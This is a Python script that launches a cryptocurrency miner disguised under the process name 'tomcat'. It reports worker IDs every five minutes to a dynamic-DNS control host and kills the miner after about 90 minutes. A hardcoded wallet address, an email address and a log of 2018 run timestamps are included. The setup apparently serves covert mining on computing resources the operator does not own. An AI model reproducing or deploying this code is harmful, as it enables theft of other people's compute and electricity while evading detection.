import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:18:05.698184
#2018-02-17 17:07:02.073587
#2018-02-17 18:55:07.589911
#2018-02-17 20:44:01.890783
#2018-02-17 22:31:05.038940
#2018-02-18 00:14:04.787000
#2018-02-18 02:06:04.415189
#2018-02-18 03:54:07.155900
#2018-02-18 05:43:01.708293
#2018-02-18 07:36:05.397460
#2018-02-18 09:23:06.593583
#2018-02-18 11:09:01.302690
#2018-02-18 12:56:04.737902
#2018-02-18 14:43:03.918672
#2018-02-18 16:33:07.408759
#2018-02-18 18:22:06.015360
#2018-02-18 20:08:01.523712
#2018-02-18 21:55:01.380107
#2018-02-18 23:44:05.390580
#2018-02-19 01:30:03.926274
#2018-02-19 03:18:06.198664
#2018-02-19 05:03:05.854101
#2018-02-19 06:47:05.096141
#2018-02-19 08:37:01.623691
#2018-02-19 10:25:09.887210
#2018-02-19 12:13:08.390044
#2018-02-19 14:00:10.913172
#2018-02-19 15:49:05.157547
#2018-02-19 17:36:07.700735
#2018-02-19 19:23:03.697595
#2018-02-19 21:09:01.782437
#2018-02-19 22:55:08.903175
#2018-02-20 00:40:01.331410
#2018-02-20 02:28:01.611345
#2018-02-20 04:18:03.486681
#2018-02-20 06:02:01.791839
#2018-02-20 07:47:01.347994
#2018-02-20 09:33:06.577213
#2018-02-20 11:17:09.357929
#2018-02-20 13:03:08.479585
#2018-02-20 14:48:05.300705
#2018-02-20 16:35:07.958264
#2018-02-20 18:21:02.074923
#2018-02-20 20:12:09.974154
#2018-02-20 22:00:06.064876
#2018-02-20 23:40:04.895159
#2018-02-21 01:24:05.548257
#2018-02-21 03:13:01.510832
#2018-02-21 05:01:05.999358
#2018-02-21 06:49:03.514656
#2018-02-21 08:36:01.814546
#2018-02-21 10:21:05.810328
#2018-02-21 12:08:01.368905
#2018-02-21 13:56:04.508336
#2018-02-21 15:41:06.552637
#2018-02-21 17:32:09.308324
#2018-02-21 19:18:01.462955
#2018-02-21 21:06:01.250052
#2018-02-21 22:53:04.030549
#2018-02-22 00:39:05.130565
#2018-02-22 02:26:06.694172
#2018-02-22 04:13:07.540397
#2018-02-22 05:58:06.296479
#2018-02-22 07:44:07.110261
#2018-02-22 09:33:06.901446
#2018-02-22 11:18:08.439230
#2018-02-22 13:03:09.470604
#2018-02-22 14:52:05.484570
#2018-02-22 16:37:07.225382
#2018-02-22 18:22:04.184441
#2018-02-22 20:14:06.111451
#2018-02-22 22:01:01.413038
#2018-02-22 23:47:07.996552
#2018-02-23 01:35:06.403860
#2018-02-23 03:21:06.980221
#2018-02-23 05:07:05.284964
#2018-02-23 06:53:07.206048
#2018-02-23 08:44:05.466647
#2018-02-23 11:02:04.361855
#2018-02-23 12:57:01.678711
#2018-02-23 14:41:10.163864
#2018-02-23 16:30:06.612818
#2018-02-23 18:18:04.526295
#2018-02-23 20:02:07.028390
#2018-02-23 21:47:09.246112
#2018-02-23 23:41:04.542639
#2018-02-24 01:29:06.339810
#2018-02-24 03:19:01.894106
#2018-02-24 05:04:03.703329
#2018-02-24 06:51:07.240963
#2018-02-24 08:43:01.377843
#2018-02-24 10:28:01.463122
#2018-02-24 12:22:06.159759
#2018-02-24 14:14:01.459042
#2018-02-24 16:00:08.054187
#2018-02-24 17:52:06.061182
#2018-02-24 19:40:04.300749
#2018-02-24 21:27:02.012658
#2018-02-25 00:11:05.952845
#2018-02-25 04:17:06.244436
#2018-02-25 07:09:07.353381
#2018-02-25 11:39:05.536596
#2018-02-25 13:57:01.672392
#2018-02-25 15:32:01.589418